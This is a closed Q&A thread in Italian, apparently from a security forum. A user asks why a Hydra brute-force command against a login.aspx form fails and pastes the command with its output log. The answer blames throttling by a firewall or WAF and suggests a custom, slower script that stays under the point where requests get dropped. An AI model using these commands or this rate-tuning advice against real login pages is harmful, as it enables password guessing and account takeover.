Brute force web page usando Hydra [closed]

Naviga le tue risposte
0

Qual è il problema in questo comando per hydra, restituisce questi errori:

Comando: 

hydra -l 950421521 -P /home/jarvis/Desktop/ams-2.lst 172.20.10.4 http-post-form "/login.aspx:&txtUserName=^USER^&txtPassword=^PASS^&LoginButton=Login:Login failed" -V

Errori: 

[DATA] max 16 tasks per 1 server, overall 64 tasks, 100 login tries (l:1/p:100), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726000" - 1 of 100 [child 0] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726001" - 2 of 100 [child 1] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726002" - 3 of 100 [child 2] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726003" - 4 of 100 [child 3] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726004" - 5 of 100 [child 4] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726005" - 6 of 100 [child 5] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726006" - 7 of 100 [child 6] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726007" - 8 of 100 [child 7] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726008" - 9 of 100 [child 8] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726009" - 10 of 100 [child 9] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726010" - 11 of 100 [child 10] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726011" - 12 of 100 [child 11] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726012" - 13 of 100 [child 12] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726013" - 14 of 100 [child 13] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726014" - 15 of 100 [child 14] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726015" - 16 of 100 [child 15] (0/0)
[ERROR] Child with pid 4712 terminating, cannot connect
[ERROR] Child with pid 4713 terminating, cannot connect
[ERROR] Child with pid 4714 terminating, cannot connect
[ERROR] Child with pid 4715 terminating, cannot connect
[ERROR] Child with pid 4716 terminating, cannot connect
[ERROR] Child with pid 4717 terminating, cannot connect
[RE-ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726000" - 16 of 101 [child 0] (0/1)
[ERROR] Child with pid 4718 terminating, cannot connect
[ERROR] Child with pid 4719 terminating, cannot connect
[ERROR] Child with pid 4720 terminating, cannot connect
[ERROR] Child with pid 4721 terminating, cannot connect
[ERROR] Child with pid 4722 terminating, cannot connect
[ERROR] Child with pid 4723 terminating, cannot connect
[ERROR] Child with pid 4724 terminating, cannot connect
[ERROR] Child with pid 4725 terminating, cannot connect
[RE-ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726001" - 16 of 104 [child 1] (0/4)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726016" - 17 of 104 [child 2] (0/4)
[ERROR] Child with pid 4726 terminating, cannot connect
[ERROR] Child with pid 4727 terminating, cannot connect
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726017" - 18 of 112 [child 3] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726018" - 19 of 112 [child 4] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726019" - 20 of 112 [child 5] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726020" - 21 of 114 [child 6] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726021" - 22 of 114 [child 7] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726022" - 23 of 114 [child 8] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726023" - 24 of 114 [child 9] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726024" - 25 of 114 [child 10] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726025" - 26 of 114 [child 11] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726026" - 27 of  114 [child 12] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726027" - 28 of 114 [child 13] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726028" - 29 of 114 [child 14] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726029" - 30 of 114 [child 15] (0/14)
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

E provo questi comandi, nessuno dei quali funziona: 

$ hydra -l 950421521 -P /home/jarvis/Desktop/ams-2.lst -s 172.20.10.4 http-post-form "/login.aspx:&txtUserName=^USER^&txtPassword=^PASS^&LoginButton=Login:Login failed" -V
    
posta JARVISAI 11.01.2017 - 07:31
fonte

1 risposta

1

[ERROR] Child with pid 4712 terminating, cannot connect

Questo di solito significa che il sito ha smesso di accettare connessioni HTTP da te; potrebbe essere che sia:

  • Troppo lento nel rispondere, e Hydra sta scadendo.
  • Il server è sovraccarico e si blocca, Hydra sta scadendo.
  • (molto probabilmente) un WAF / firewall sta riducendo le richieste poiché si sta sovraccaricando il servizio.

Probabilmente stai meglio di scrivere uno script veloce che li provi (Hydra ha un tasso di falsi positivi più alto quando esegue accessi al modulo), e rallenta un po '; trova il punto giusto prima che inizi a lasciare cadere le tue richieste.

    
risposta data 11.01.2017 - 07:57
fonte

Leggi altre domande sui tag

Memorizzazione della sessione in querystring Derivazione delle chiavi di sessione da master_secrets durante la ripresa della sessione